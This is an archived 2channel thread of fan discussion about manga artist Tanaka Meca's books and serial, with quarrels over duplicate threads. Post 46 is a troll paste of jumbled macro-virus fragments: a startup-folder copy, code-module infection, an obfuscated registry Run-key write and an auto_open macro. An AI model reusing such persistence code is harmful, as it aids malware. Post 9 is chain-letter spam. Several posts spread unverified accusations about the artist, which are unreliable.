2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

田中メカ7

1 :花と名無しさん:2007/09/12(水) 22:19:53 ID:???0
前スレ
http://anime2.2ch.net/test/read.cgi/gcomic/1145093157/

過去スレ
http://comic6.2ch.net/test/read.cgi/gcomic/1070383225/
http://comic.2ch.net/test/read.cgi/gcomic/1041487335/l50
http://choco.2ch.net/gcomic/kako/997/997452031.html
http://comic.2ch.net/gcomic/kako/1003/10038/1003846170.html
http://salad.2ch.net/gcomic/kako/981/981909225.html



2 :花と名無しさん:2007/09/12(水) 22:22:21 ID:???0


3 :花と名無しさん:2007/09/12(水) 22:25:11 ID:???0
>>1

4 :花と名無しさん:2007/09/12(水) 22:25:54 ID:???0

自分も準備してた。よかった重複しなくて

既刊
「お迎えです。」全5巻
「天然パールピンク」全4巻
「セーラー服にお願い!」1〜4巻
「7時間目ラプソディー」
「キスよりも早く」1巻〜
「お迎えです。」文庫1巻は9月14日発売!

5 :花と名無しさん:2007/09/12(水) 22:26:01 ID:???0
更新しときますよ

既刊
「お迎えです。」全5巻
「天然パールピンク」全4巻
「セーラー服にお願い!」前4巻
「キスよりも早く」1〜

6 :花と名無しさん:2007/09/12(水) 22:26:18 ID:???0
メカスレが3つもあるとカオス…

7 :花と名無しさん:2007/09/12(水) 22:26:32 ID:???0
前スレ980です
スレ立て自分だったとは…スマソ

8 :花と名無しさん:2007/09/12(水) 22:26:39 ID:???0
>>1

前スレ1000GJ

9 :花と名無しさん:2007/09/12(水) 22:26:41 ID:PNqHzcir0
これはアメリカのゲームです。1度やってみてください。
これは、たった3分でできるゲームです。試してみてください。 驚く結果をご覧いただけます。
このゲームを考えた本人は、メールを読んでからたった10分で願い事が
かなったそうです。このゲームは、おもしろく、かつ、あっと驚く結果を 貴方にもたらすでしょう。
約束してください。絶対に先を読まず、1行ずつ進む事。 たった3分ですから、ためす価値ありです。
まず、ペンと、紙をご用意下さい。 先を読むと、願い事が叶わなくなります。
@まず、1番から、11番まで、縦に数字を書いてください。
A1番と2番の横に好きな3〜7の数字をそれぞれお書き下さい。
B3番と7番の横に知っている人の名前をお書き下さい。(必ず、興味の
ある性別名前を書く事。男なら女の人、女なら男の人、ゲイなら同姓の名
前をかく)
必ず、1行ずつ進んでください。先を読むと、なにもかもなくなります。
C4,5,6番の横それぞれに、自分の知っている人の名前をお書き下さ
い。これは、家族の人でも知り合いや、友人、誰でも結構です。
まだ、先を見てはいけませんよ!!
D8、9、10、11番の横に、歌のタイトルをお書き下さい。
E最後にお願い事をして下さい。さて、ゲームの解説です。
1)このゲームの事を、2番に書いた数字の人に伝えて下さい。
2)3番に書いた人は貴方の愛する人です。
3)7番に書いた人は、好きだけれど叶わぬ恋の相手です。
4)4番に書いた人は、貴方がとても大切に思う人です。
5)5番に書いた人は、貴方の事をとても良く理解してくれる相手です。
6)6番に書いた人は、貴方に幸運をもたらしてくれる人です。
7)8番に書いた歌は、3番に書いた人を表す歌。
8)9番に書いた歌は、7番に書いた人を表す歌。
9)10番に書いた歌は、貴方の心の中を表す歌。
10)そして、11番に書いた歌は、貴方の人生を表す歌です。
この書き込みを読んでから、1時間以内に10個の掲示板にこの書き込みをコピーして貼って下さい。
そうすれば、あなたの願い事は叶うでしょう。もし、貼らなければ、願い事を逆のことが起こるでしょう。とても奇妙ですが当たってませんか?

10 :花と名無しさん:2007/09/12(水) 22:27:13 ID:???0
>>4
あ、ごめんかぶった

フライングが出てまたトラブルにならないように
次からは980以降に立てるよう1に書いといた方がいいかも。

11 :花と名無しさん:2007/09/12(水) 22:27:37 ID:???0
1乙

少女漫画板名物ウィルスはいつ来るかなワクワク

12 :花と名無しさん:2007/09/12(水) 22:30:21 ID:???0
文庫本出るのか 知らなかった

今やってるのはあんまり好きじゃないがお迎えですだけは好きだから
書き下ろしショートショートでもあったら買おうかな
今のメカが書くといちゃいちゃ物になりそうでイメージ壊れるかもしれないけど

13 :花と名無しさん:2007/09/12(水) 22:31:48 ID:???0
テンプレ作ろうぜ
次スレは>>980とか

14 :花と名無しさん:2007/09/12(水) 22:32:10 ID:???0
>>10
だね。
とりあえず、今のテンプレには間に合わないけど、
ルール自体はこのスレから適用ということで。

15 :花と名無しさん:2007/09/12(水) 22:33:25 ID:???0
>>13だけど被ってたスマソ

16 :花と名無しさん:2007/09/12(水) 22:33:47 ID:???0
テンプレってこんな感じ?

田中メカについて語るスレッドです。
テンプレ変更した人は950までに提案してください。
次スレは980が立ててください。

前スレ

過去スレ


17 :花と名無しさん:2007/09/12(水) 22:34:18 ID:???0
>>13と「田中メカについて語りましょう」の一文ぐらいは次からあった方がいいかも
文庫書下ろしあるかなー

18 :花と名無しさん:2007/09/12(水) 22:34:29 ID:???0
>>16
あとは既刊と連載?

19 :花と名無しさん:2007/09/12(水) 22:35:26 ID:???0
>>16
うお被った

なんかこのスレ入ってから被りが多いなw
みんな似たような事考えてるもんだな

20 :花と名無しさん:2007/09/12(水) 22:36:31 ID:LQExPkOG0
ちょっと上げる

21 :花と名無しさん:2007/09/12(水) 22:36:36 ID:???0
「い」が抜けたorz

田中メカについて語るスレッドです。
テンプレ変更したい人は950までに提案してください。
次スレは980が立ててください。

前スレ

過去スレ

>>2に既刊情報・連載情報

22 :花と名無しさん:2007/09/12(水) 22:36:38 ID:???0
普段超過疎なのにこの伸びようスレ住人が必死なのがよくわかる

23 :花と名無しさん:2007/09/12(水) 22:38:12 ID:???0
本誌が出たらまた伸びると思うけどな

24 :花と名無しさん:2007/09/12(水) 22:38:38 ID:???0
>>22
ああいう想定外の事が起きちゃったからなー
正直なところ、スレ立ては950あるいは980以降ってのは暗黙の了解だと思ってた

25 :花と名無しさん:2007/09/12(水) 22:38:48 ID:???0
さすがに変な粘着の立てたスレは勘弁して欲しいからな…
今の連載、正直、面白くないと思ってるが、それとコレとは別だ

26 :花と名無しさん:2007/09/12(水) 22:39:51 ID:???0
文庫が楽しみだ。
今週の金曜日か。

27 :花と名無しさん:2007/09/12(水) 22:40:57 ID:???0
毎回のコスプレはメイド服とかのいかにもコスプレコスプレした系なら
秋葉系とか流行ってる時代だし、MとNの肖像とかにもあったからそんなに気にならなかったが、
男物のシャツいちまいだけとかは単にエロ狙ってるようで微妙だなー

お迎えの毎回面白いテーマがついてるコスプレは良かったんだけど。

28 :花と名無しさん:2007/09/12(水) 22:41:01 ID:???0
こっちの伸びが多ければこっちが本スレって認めてもらえるかな?

29 :花と名無しさん:2007/09/12(水) 22:42:27 ID:???0
>>28
アンチと信者以外は無関心だよ

30 :花と名無しさん:2007/09/12(水) 22:43:15 ID:???0
>>27
あれはナベシマさんの着ぐるみあってこそかと
ゆずこだけだったらあざとさを感じたと思う

31 :花と名無しさん:2007/09/12(水) 22:43:36 ID:???0
ならいいか

32 :花と名無しさん:2007/09/12(水) 22:44:24 ID:???0
正直、重複はどうかと思うが、他板でアンチの立てたスレを
仕方ないと使ってたら、アンチが調子に乗ってどんどん早い
番号で立てだしたりしたから、仕方ないかなとも思う。
上のケースだと、アンチの立てたスレは無視して、ちゃんとした
スレを住民が立てるようになったら、いつの間にか収まったし。

33 :花と名無しさん:2007/09/12(水) 22:46:24 ID:???0
こっち本スレでいいよ。
なんだったら、向こうはアンチが使えばいい。

34 :花と名無しさん:2007/09/12(水) 22:49:08 ID:???0
好きな方に書きこんであとは削除人に判断を委ねるか
どちらかが自然に落ちるのを待とう

35 :花と名無しさん:2007/09/12(水) 22:50:07 ID:???0
仕事終わって帰ってきてみたら何この事態。
あんま厨くさいことしてんなよ。

まあこっち使うけどさ。

36 :花と名無しさん:2007/09/12(水) 22:53:04 ID:???0
ここの人たちって、お迎えで好きになったって人多いのかな?
私は今の連載からなんだけど、お迎え持ってないから
文庫が楽しみだ。

37 :花と名無しさん:2007/09/12(水) 22:55:14 ID:???0
女の子が病院でガリガリの男の子をお姫様抱っこする短編からメカ作品に入った

38 :花と名無しさん:2007/09/12(水) 22:59:46 ID:???0
初めて読んだのは天然求心力αだったな。
面白く読んだけど、意識して追いかけ始めたのは
お迎えからだ。

39 :花と名無しさん:2007/09/12(水) 23:07:31 ID:???0
>>37
無敵? それともお薬かな

40 :花と名無しさん:2007/09/12(水) 23:11:30 ID:8AECwW730
あげ

41 :花と名無しさん:2007/09/12(水) 23:16:09 ID:???O
上げると厨がよってくるのでサゲの方がいいんじゃない?

42 :花と名無しさん:2007/09/12(水) 23:55:54 ID:???0
まあどっちでもよし

43 :花と名無しさん:2007/09/13(木) 00:03:09 ID:???0
どっちも馬鹿だよ・・・

44 :花と名無しさん:2007/09/13(木) 00:06:39 ID:???0
くだらなすぎて涙が出るよ
学園祭の喧嘩かよ

45 :花と名無しさん:2007/09/13(木) 01:17:11 ID:???0
お迎えでファンになったので文庫楽しみ

46 :花と名無しさん:2007/09/13(木) 02:46:49 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


47 :花と名無しさん:2007/09/13(木) 04:12:07 ID:???0
花と名無しさん:2007/08/16(木) 04:12:14 ID:???0
私もぶっちゃけ関係者だけど私怨厨は関係者なら誰にでもすぐ正体がわかる

前にメカが所属してたサークルで色々ごたごたがあって
追い出された奴が数人いて、その直後にメカがデビューしたから
なんか知らんが「騒動の発端はメカ」「メカが自分を追い出した」とか
言い出す輩が出て、その事吹聴しまわってる奴がいるんだよ。
メカも騒動に加わってどっちかというとそいつらを追い出す側に廻ってたけど
大多数がそうだったからこそ奴らは追い出されたわけだし、
メカは不特定多数の消極的追い出し派の代表になんらかの意図によって勝手にされただけ。
まあ単にデビューした事で名前が知られたせいだと思われる。
奴らが追い出されたのはそういう風にちょっと目立つ奴に徹底的にいやがらせをするせいだったし。

サークル関係のサイト荒らしまくって書きこめなくなったから今度は2chかよ。
サークルとは関係なく本人となにか問題があったにしても、だったらサークルの事持ち出すのは筋じゃない。
メカが前に持ってたサイトに圧力かけたのも私怨厨らしいし、
エスカレートしてこのまま逮捕コースでも取る気か。
私怨厨だけじゃなく他の奴にも迷惑になるからいい加減にしてほしい。

この書き込みからわけ分からない流れになったんだよな


48 :花と名無しさん:2007/09/13(木) 04:14:14 ID:???0
>俺も関係者だけどある事ない事書くなよ
あれはメカが一方的に悪いじゃん
みんなメカには迷惑してんだよ
公の掲示板にも公表すべき悪行だろ


49 :花と名無しさん:2007/09/13(木) 04:16:41 ID:???0
>昔メカさんをサイトを作ったりして大プッシュしていた友達がいたけど
なんかもめてなくなったんだよね。お迎えでちょっと売れたから
天狗になっちったとかで


50 :花と名無しさん:2007/09/13(木) 04:19:16 ID:???O
>>47
その書き込みからわけわからない流れになったといいながら
またそれを貼る47w
また荒らしたいんだな

明日はお迎えの単行本出るから明日にはスレ落ち着いて欲しいね

51 :花と名無しさん:2007/09/13(木) 04:20:14 ID:???0
>そら今まで応援してきたご友人達を切ってきたんだから
あちこちで恨まれててもおかしくはないと思うよ。
自分が聞いた話でもひでぇなオイというのもあったし。

前のスレからの転載だが、メカ事件はこんなもんか
結局作者と知り合いの喧嘩ですか

52 :花と名無しさん:2007/09/13(木) 08:26:16 ID:???0
正直なところ鮫島事件だとしか思えない

53 :花と名無しさん:2007/09/13(木) 08:42:29 ID:???0
お迎えですの単行本ってもう絶版してんの?

54 :花と名無しさん:2007/09/13(木) 08:56:29 ID:???0
作者本人とその知り合いの泥試合だろ
馬鹿じゃないの

55 :花と名無しさん:2007/09/13(木) 11:11:37 ID:???O
メカが怨まれてるのはよくわかった
ただ過去の内輪揉めでここでキーキー騒ぐ奴もかなり痛いよ
メカは痛い人みたいだけどどっちもどっちにしか見えない

56 :花と名無しさん:2007/09/13(木) 14:43:33 ID:???0
てかさ、なんであっちの方を何度も攻撃してるの?
スルーしとけばいいのに必死になってキーキーわめいてさ。
みっともないし、なんかこっちが悪いみたいじゃん。

57 :花と名無しさん:2007/09/13(木) 15:05:38 ID:???0
てっぺーちゃんが可愛ければそれでよし。
作者がどんだけワルかろうが、イチドクシャにゃそんなのかんけーねぇ

58 :花と名無しさん:2007/09/13(木) 19:50:16 ID:???0
弟がただのマスコット扱いになっちゃってるからもうちょっと上手く使ってほしい
可愛さは認めるが

59 :花と名無しさん:2007/09/13(木) 20:15:17 ID:???0
作者本人の必死さに力が抜ける


60 :花と名無しさん:2007/09/13(木) 20:16:11 ID:???0
当て馬男(名前すら覚える気にならない)はとりあえずいらない

61 :花と名無しさん:2007/09/13(木) 20:20:05 ID:???0
作者自身が自分で立てたスレはここだけだろう
どこまで恥知らずなのか…

62 :花と名無しさん:2007/09/13(木) 21:46:59 ID:???0
>>61
さくしゃじゃなくてかんけいしゃかも(白癬等々)いままでの書き込みもふくめて
販促のための話題作りか…

63 :花と名無しさん:2007/09/13(木) 23:46:13 ID:???0
>>62
なるほど。良くも悪くも話題にあげたい訳ね。
それだけ追い詰められてるんだろうなぁ…

64 :花と名無しさん:2007/09/14(金) 00:37:24 ID:???0
アンチが叩けば叩くほど、作者に同情が行くんだって
わかんないのかな。

65 :花と名無しさん:2007/09/14(金) 01:47:28 ID:???O
同情はするし、この話題より漫画の話がしたいけど
現在進行型の漫画が面白くないのでネタが振れない…
早くお迎え出ないかな

66 :花と名無しさん:2007/09/14(金) 02:50:05 ID:???0
>>64
あんまりヒス起こすとしわが増えるよ

67 :花と名無しさん:2007/09/14(金) 03:40:18 ID:???0
>>65
今日発売だよね?
楽しみだ。

68 :花と名無しさん:2007/09/14(金) 11:43:10 ID:???0
文庫買う人けっこういるのか
書下ろしの有無を教えてくれ

69 :花と名無しさん:2007/09/14(金) 15:31:01 ID:???0
自分も教えて欲しい
ここの住人の参考にして買うの決める

70 :花と名無しさん:2007/09/14(金) 17:02:04 ID:???0
書き下ろし4P メインは津田くん
インタビュー3P 「お迎えです。の頃」

71 :花と名無しさん:2007/09/14(金) 18:21:53 ID:???0
津田好きとしては買うべきか…ううーん


72 :花と名無しさん:2007/09/15(土) 12:24:49 ID:???O
田舎だからかまだ入荷してなかった
入荷は連休明けだorz

73 :花と名無しさん:2007/09/15(土) 15:25:21 ID:???O
津田好きだからコミクス持ってるけど買った
でも正直物足りないorz
インタビュー面白かったけどなくてもいいから書き下ろし増やしてほしかったな

74 :花と名無しさん:2007/09/15(土) 19:54:18 ID:???0
津田の話どんなのだった?

75 :花と名無しさん:2007/09/16(日) 21:17:25 ID:???O
>>74
津田くんとハナちゃんと先生の話

76 :花と名無しさん:2007/09/16(日) 22:15:24 ID:???0
一色先生出るのか
買ってくる

77 :花と名無しさん:2007/09/17(月) 23:16:04 ID:???0
津田君の話しよかったね
忘れられないうちは無理に忘れることもないだろうけど
このままいつまでも忘れない気もする

78 :花と名無しさん:2007/09/18(火) 15:00:11 ID:???0
重複スレストになったね
少女漫画版では初めて見た

79 :花と名無しさん:2007/09/18(火) 21:21:42 ID:???0
一つになったらなったで、ここで叩きが続くんだけどな

80 :花と名無しさん:2007/09/18(火) 22:16:39 ID:???0
>>75
迷うが買おうかな。自分も津田くん好きだし。

81 :花と名無しさん:2007/09/18(火) 22:26:01 ID:???0
>>78
え?しょっちゅうあるだろw

82 :花と名無しさん:2007/09/19(水) 21:11:43 ID:???0
作者本人が必死にお迎えの話題に持っていこうとしてたら
怖いね

83 :花と名無しさん:2007/09/19(水) 21:52:41 ID:???0
君のその発想が怖いね

84 :花と名無しさん:2007/09/19(水) 23:24:19 ID:???0
1つになったことでまた叩きとの戦いになりましたね
2つに分かれていたときの方が、まだマトモに話せてたと
思うんだけど。


85 :花と名無しさん:2007/09/20(木) 00:43:31 ID:???O
今この流れのどこが叩きなのか本気でわからん
自分は中の人には興味がないのでどうでもいいや

ところで文庫の2巻っていつ出るのかな?来月?

86 :花と名無しさん:2007/09/20(木) 00:53:09 ID:???O
叩きはムキになって絡むと長引くからスルーすればいいよ
絡みたければ絡みスレへドゾ

87 :花と名無しさん:2007/09/22(土) 16:15:37 ID:???0
ちょびっと進展?


88 :花と名無しさん:2007/09/22(土) 18:07:01 ID:???0
>>87
弟くん?かな
家族と仲悪かったよね先生

89 :花と名無しさん:2007/09/22(土) 18:36:58 ID:???0
お迎えしか語ることがないのもむなしいなー・・・

90 :花と名無しさん:2007/09/22(土) 19:20:00 ID:???O
お迎え以外でも読み切りはいい話多くて好きだけどな
とくに先生生徒でも7時間目は可愛かった
帯の煽りは嫌だったけど…
帯の煽りって担当がするんだっけ?
もしそうならメカさんの今の連載がすごく納得できるんだけど

91 :花と名無しさん:2007/09/23(日) 08:27:50 ID:???O
7時間目が良かったから、余計に今の連載が不評なのかなあ

92 :花と名無しさん:2007/09/23(日) 09:47:30 ID:???0
常識人がメインキャラの中にいないから
読んでる自分の感覚とのズレがひどい

93 :花と名無しさん:2007/09/23(日) 23:31:25 ID:???0
毎回ワンパターンなんだよね。
文乃の感情が高まり泣くor逃げる→文乃ピンチ→先生現る
→文乃攫われる→二人っきりになって先生ドアップで愛を語る
→文乃愛されてると分かって泣く→先目立つところにキスマークつける
→次の日厚着な文乃&妙に空気読んだ弟&保育士が楽しそうでオチ

94 :花と名無しさん:2007/09/24(月) 00:38:46 ID:???0
うん。確かに展開はワンパターンだ。天パ以降。
ラブコメの引出しが少ないのかも。

もうちょっとシリアスにしてもいいと思うんだ。

95 :花と名無しさん:2007/09/24(月) 11:17:56 ID:???0
あの地味な顔で愛を語られてもなあ、先生。
ラブ米どころか物語のネタ自体の引き出しがないんじゃないの
シリアスにしたらまた病弱片思い少女が出るのかなー

ワンパターンは目をつむっても、主人公の常識のなさは気分が悪い
後弟の作り物っぽさも気になるけど、子供の扱いが、子持ちとしては
ありえなさ過ぎて。
作者、子供に触れることない環境なんだなとうんざりする。




96 :花と名無しさん:2007/09/24(月) 11:41:16 ID:???0
地味な顔なのは仕方ないので許してあげてください><

97 :花と名無しさん:2007/09/24(月) 20:25:48 ID:???0
子持ちのリアリティとか生々しさは不要('A`)

98 :花と名無しさん:2007/09/24(月) 21:31:44 ID:???0
前回強引なことしてゴメンネと文乃を自由にしといて
やっぱりイヤーと独占欲で攫っていきラブシーンこのループばっか。
さすがにこんだけ続けられるとフォローもできないわ

99 :花と名無しさん:2007/09/24(月) 21:54:11 ID:???0
生々しさはいらないけど弟がただのマンセー要員と言うのは
痛い気がする


100 :花と名無しさん:2007/09/24(月) 22:02:03 ID:???0
あの弟があまりにご都合な存在なのはなんか嫌だな…

101 :花と名無しさん:2007/09/24(月) 23:45:12 ID:???O
主人公と教師よりもあの環境で弟がどんな風に成長するのかが気になるな…

102 :花と名無しさん:2007/09/25(火) 09:14:41 ID:???0
弟はせめて柚子レベルぐらいには目立って欲しい

103 :花と名無しさん:2007/09/25(火) 13:47:38 ID:???0
柚子って誰だっけ

104 :花と名無しさん:2007/09/25(火) 15:57:31 ID:???0
>>103
お迎えのゆずこだろう

105 :花と名無しさん:2007/09/25(火) 22:09:12 ID:???0
思い切り忘れられてるwww

106 :花と名無しさん:2007/09/25(火) 23:02:12 ID:???0
>>105
お迎え読んでないんだよね
文庫出たしそのうち買いたいが


107 :花と名無しさん:2007/09/26(水) 18:39:05 ID:???0
文庫宣伝乙

108 :花と名無しさん:2007/09/26(水) 20:09:43 ID:???0
書下ろしが気になってるが4Pというのがなかなか…
そもそも文庫をなかなか本屋で見かけない

109 :花と名無しさん:2007/09/26(水) 20:44:54 ID:???0
>>108
ないよねえ…3万部も刷ってない様な希ガス

110 :花と名無しさん:2007/09/26(水) 23:58:50 ID:???0
そうなの?うちの近所の本屋では大きな所も小さな所も置いてあったよ

111 :花と名無しさん:2007/09/27(木) 08:34:18 ID:???0
Amazonで雑誌とかもまとめて注文&分割発送(゚д゚)ウマー

112 :花と名無しさん:2007/10/01(月) 17:04:56 ID:???O
ここで比較的好評だったので、お迎え文庫買いました。
描き下ろしで、津田くん萌えになりますた(*´∀`)

113 :花と名無しさん:2007/10/02(火) 23:04:26 ID:???O
「天然」から年月あいて「セーラー服に―」を購入し始めました。第2話の最後の雛菊、[WIRE]?

114 :花と名無しさん:2007/10/03(水) 08:02:11 ID:???0
>>113
日本語でおk

115 :花と名無しさん:2007/10/04(木) 21:45:39 ID:???O
お迎えが終わったあとララも卒業したけど、あんなにメカの絵が変わってるとは
目をもうちょいでかくすると椎名あゆみの絵に見える


116 :花と名無しさん:2007/10/08(月) 07:46:56 ID:???O
セーラーの後半位からかな、なんかキャラの顔が長くなったと思う。
別にロリなのが好きな訳じゃないが、メカ絵に合ってない気がするんだ。
…今更だけど。

117 :花と名無しさん:2007/10/08(月) 13:22:16 ID:???0
絵が下手になったね

118 :花と名無しさん:2007/10/08(月) 19:52:17 ID:???0
絵は上手くなってるだろ。昔よりずっと。

119 :花と名無しさん:2007/10/08(月) 22:00:09 ID:???0
好みに合わないと「劣化」っていうヤツが多すぎ

120 :花と名無しさん:2007/10/08(月) 22:49:19 ID:???O
メカさん普通にうまくなったよね
ララ連載陣の中でめちゃくちゃうまいとか綺麗な方ではないけど、
デビュー時と比べて全然違うよ(デビュー時の絵が結構酷かったから余計)

121 :花と名無しさん:2007/10/09(火) 05:24:59 ID:???O
キスよりも早く1巻って何か読み切り入ってますか?
この人の読み切り好きなもので。

122 :花と名無しさん:2007/10/09(火) 07:25:14 ID:???0
>>121
それぐらいぐぐれ

123 :花と名無しさん:2007/10/13(土) 10:11:51 ID:???O
デビュー時がすごく下手だったけど今は上手くなったね
でも2年前の絵に比べたら今は劣化してると思う
カラー絵は特に

124 :花と名無しさん:2007/10/13(土) 22:40:59 ID:???0
自分もカラーがどんどん変になってる気がする

125 :花と名無しさん:2007/10/14(日) 00:48:43 ID:???0
そうか?
表紙とか見ても華やかになったな〜と思うだけだが。
ただ、露出するなら女のコに色気もっとないとダメだろとは思う。

126 :花と名無しさん:2007/10/15(月) 14:29:53 ID:???O
可愛いっちゃ可愛いが、そこはかとなく平成ヒトケタ台のにほひがする。
突き抜けて古くさくはなくても、微妙〜に古いって感じ>カラー

127 :花と名無しさん:2007/10/15(月) 19:39:48 ID:???0
まあそれが良さってことで・・・
変に平成に変わられてもそれはそれでなんか嫌だw

128 :花と名無しさん:2007/10/27(土) 22:13:10 ID:???0
表紙&巻頭だというのに過疎ってるね
感想が一つも出ないとはオワッタなメカ

129 :花と名無しさん:2007/10/27(土) 22:36:10 ID:???0
読んだけど
文乃はどんだけぺったんこなんだと思った

130 :花と名無しさん:2007/10/27(土) 23:51:31 ID:???0
>>128
2ちゃんが全てではないだけかと
このスレだけで判断してる辺り、終わってるのはどう見ても(ry

>>129
きっとA以下。最近はAAもあるんだっけ

131 :花と名無しさん:2007/10/28(日) 02:52:58 ID:???0
長編はタラシを出さなきゃ気が済まないのかな
色ボケキャラはいらない派なんだが

132 :花と名無しさん:2007/10/29(月) 09:09:46 ID:???O
>>130
文乃はスタイルいい設定なのにA以下っすかwww
胸がなくて全体に細いのは確かにスタイルいいとも言うが、
メカさんの絵だと寸胴というか幼児体型にしか見えない…
わかりやすいグラビアモデルみたいなナイスバディにしたら
あからさますぎると思って敢えて胸なしにしたんだろうか

133 :花と名無しさん:2007/10/31(水) 02:01:06 ID:???0
文乃は胸コンプレックス。

134 :花と名無しさん:2007/10/31(水) 07:11:55 ID:???0
>>130
AAAってのもありますぜ

135 :花と名無しさん:2007/10/31(水) 08:36:54 ID:???0
それってブラ付ける意味あんの?無駄なだけじゃん
その分費用抑えられるんだし

136 :花と名無しさん:2007/10/31(水) 11:44:34 ID:???0
>>135
胸は無くても、乳首が育ってる場合、服と擦れて痛い時もある
無意味なことは無いよ

137 :花と名無しさん:2007/10/31(水) 21:23:47 ID:???0
ばんそうこう貼れよ。献血センターとかで無料配布してるやつ
ブラなんてもったいない

138 :花と名無しさん:2007/11/01(木) 12:05:33 ID:???0
>>137
絆創膏の方が現実的じゃないっつの('A`)
どこのエロゲだよ

139 :花と名無しさん:2007/11/01(木) 18:36:28 ID:???0
いーじゃないかw
先生が喜びそうだよ

140 :花と名無しさん:2007/11/01(木) 19:33:28 ID:???0
文乃って実は性同一性障害なんじゃないの?

141 :花と名無しさん:2007/11/02(金) 06:53:18 ID:???0
そもそもこの漫画自体が趣味の悪いエロゲのようなものだから
どこまで落ちるかな、この作者。
もうオチ対象として眺めてるよ・・・

142 :花と名無しさん:2007/11/02(金) 09:28:39 ID:???0
少しは内容が読ませるものになるかなと見守ってきたけど
今月もテンプレ展開でガッカリだ

143 :花と名無しさん:2007/11/05(月) 13:40:52 ID:???0
>>141
なんとなく分かる気がする。
今時半裸や馬乗りになってドキッ☆くらいじゃ萌えられない
感覚が古くさいよ

144 :花と名無しさん:2007/11/05(月) 13:54:34 ID:???0
自分が萌えられないというなら、読まなきゃいいのに('A`)

145 :花と名無しさん:2007/11/05(月) 14:46:45 ID:???0
だからどこまで墜ちるかをnrnrするヲチ対象なんだろ

146 :花と名無しさん:2007/11/06(火) 03:22:22 ID:???0
面白いと思って読んでる読者もいること忘れなきゃ
いいんだけどね

147 :花と名無しさん:2007/11/06(火) 14:47:12 ID:???0
>>141
ヲチはヲチ板でよろ。ここじゃ板違い。

148 :花と名無しさん:2007/11/06(火) 18:03:16 ID:???0
ヲチ板ってそういうヲチも含むんだっけ?
ネット上のものだけだと思ってたが

149 :花と名無しさん:2007/11/06(火) 18:20:01 ID:???0
>>146
でも面白いっていう感想やレスがないじゃん
面白いならもっと書き込みがあってもいいもんだが

150 :花と名無しさん:2007/11/06(火) 21:43:03 ID:???0
先に立ったスレをアンチが立てたと決めつけて落としたのに過疎ってる罠w


151 :花と名無しさん:2007/11/06(火) 22:07:17 ID:???0
話題がなきゃ過疎るに決まってるじゃないか

152 :花と名無しさん:2007/11/06(火) 23:44:48 ID:???0
>>149
雰囲気の悪いスレに、わざわざ「面白い」って書き込む人も居ないんじゃ

153 :花と名無しさん:2007/11/06(火) 23:56:09 ID:???0
話題を振る人もいないし、アンチのレスに文句を言うだけ

154 :花と名無しさん:2007/11/07(水) 04:23:09 ID:???0
>>149
ちゃんとあるけど?

155 :花と名無しさん:2007/11/07(水) 20:42:03 ID:???0
感覚が古いと言う意見、分かる。
30位のおばちゃんが無理して安物のギャル服着ているような
違和感・・・・

156 :花と名無しさん:2007/11/08(木) 02:34:11 ID:???0
巻末目次の、鉄平による「今月の見所☆」にハラ抱えてワロタ
せめて先生にしとけよw

157 :花と名無しさん:2007/11/09(金) 14:46:47 ID:???0
鉄平が使われただけ快挙だよw
あそこはたいてい主役が使用されてるから

158 :花と名無しさん:2007/11/11(日) 01:47:59 ID:???0
来月新刊出るらしいな

159 :花と名無しさん:2007/11/11(日) 02:00:01 ID:???0
近所のブクオフに既に一巻が並んでたが売れるのか?

160 :花と名無しさん:2007/11/11(日) 07:33:32 ID:???0
売れて欲しくないならそういえばおk
誘い受けはきもい

161 :花と名無しさん:2007/11/11(日) 10:05:59 ID:???0
なんとか話題を作ろうと必死すぐる

162 :花と名無しさん:2007/11/11(日) 11:55:02 ID:???0
>>160
キモイのはおまい
売れても売れなくてもどっちでもいい
なんで売れてほしくないなんて決め付けるんだ
どの程度売れるかに興味示したらいけないのか?

163 :花と名無しさん:2007/11/11(日) 14:08:09 ID:???0
>>162
アンチの多いスレで>>159みたいなレスしたら、勘繰られてもしょうがない
>>162の2行目を足すだけで、>>160みたいなツッコミは防げるのに

ここは2ちゃんですよ
突っ込まれたくないなら、それなりの文章を書けばいいだけのこと

164 :花と名無しさん:2007/11/11(日) 14:24:55 ID:???0
たかだか一行のレスを悪意と見なすほうもどうかと思うよ。
すごく過剰反応じゃない?

165 :花と名無しさん:2007/11/11(日) 14:31:34 ID:???0
特に後ろめたくなければ但し書きなんてしないでしょうに・・・
勘ぐるほどでもないのでは
貴女の言い分がまかり通るなら
簡易なレスはほとんど誤解されてしまうってことになる


166 :花と名無しさん:2007/11/11(日) 16:38:36 ID:???0
馬鹿馬鹿しい流れだ
>>163みたいな自治厨ウザー

167 :花と名無しさん:2007/11/11(日) 18:53:03 ID:???0
折角アンチスレをけ落としたのに、話すことは結局アンチについてなんだね

168 :花と名無しさん:2007/11/11(日) 18:57:46 ID:???0
はじめて立てたスレが落とされたからってあなたしつこいわよん

169 :花と名無しさん:2007/11/11(日) 23:53:46 ID:???0
168決めつけカコワルイ

170 :花と名無しさん:2007/11/12(月) 11:30:46 ID:???0
なにこのスルースキルが欠如したスレ

171 :花と名無しさん:2007/11/12(月) 12:50:58 ID:???0
それがメカとメカファンのクォリティ

172 :花と名無しさん:2007/11/12(月) 13:24:18 ID:???0
>>171
そこで何故かメカを持ち出すところがアンチクオリティ

173 :花と名無しさん:2007/11/12(月) 22:25:11 ID:???0
イ言者vsアンチ


面 白 く な っ て き ま し た

174 :花と名無しさん:2007/11/12(月) 22:30:15 ID:???0
